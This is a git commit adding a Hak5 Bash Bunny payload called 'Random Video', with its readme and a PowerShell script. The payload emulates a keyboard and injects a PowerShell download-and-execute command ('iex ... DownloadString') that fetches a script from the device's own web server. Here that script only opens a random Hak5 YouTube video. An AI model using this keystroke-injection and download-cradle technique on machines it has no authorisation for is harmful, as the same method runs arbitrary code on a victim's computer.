New Payload - Random vid (#504)

* readme * Payload
2025-10-29 16:58:25 +00:00 · 2022-03-16 21:28:18 +00:00 · 2022-03-16 21:28:18 +00:00 · 946879ae90
commit 946879ae90
parent 6bacea8bc8
3 changed files with 81 additions and 0 deletions
--- a/payloads/library/general/Win_PoSH_RandomVid/payload.txt
+++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
@ -0,0 +1,33 @@
+#!/bin/bash
+# Title:          Random Video
+# Description:    Downloads a list of vids from YouTube. Then pick a random one then opens it.
+# Author:         Cribbit
+# Version:        1.0
+# Category:       General
+# Target:         Windows (Powershell 5.1+)
+# Attackmodes:    RNDIS_ETHERNET HID
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 300
+RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+LED FINISH
--- a/payloads/library/general/Win_PoSH_RandomVid/readme.md
+++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md
@ -0,0 +1,24 @@
+# Random Video
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: General
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed). 
+
+Then pick one at random, then opens it in the browser.
+
+## Colours
+| Status   | Colour                        | Description                 |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP    | Magenta solid                 | Setting attack mode         |
+| ATTACK   | Yellow single blink           | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished          |
--- a/payloads/library/general/Win_PoSH_RandomVid/s
+++ b/payloads/library/general/Win_PoSH_RandomVid/s
@ -0,0 +1,24 @@
+# Get the RSS feed for the Hak5 Channel
+Write-Output "Connecting to youtube"
+$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml"
+Write-Output $Response.StatusCode
+# See if it successful
+If ($Response.StatusCode -eq "200") {
+	# set the XML
+	$Xml = [xml]$Response.Content
+	$Entries = @()
+	# Loop each entry creating an object
+	ForEach ($Entry in $Xml.feed.entry) {
+			$Entries += [PSCustomObject] @{
+				'Updated' = [datetime]$Entry.updated
+				'Title' = $Entry.title
+				'Link' = $Entry.Link.href
+		}
+	}
+	# Gets a random number
+	$int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)
+	$Entry = $Entries[$int]
+    # Opens link
+	Start-Process $Entry.Link
+	Write-Output $Entry.Title
+}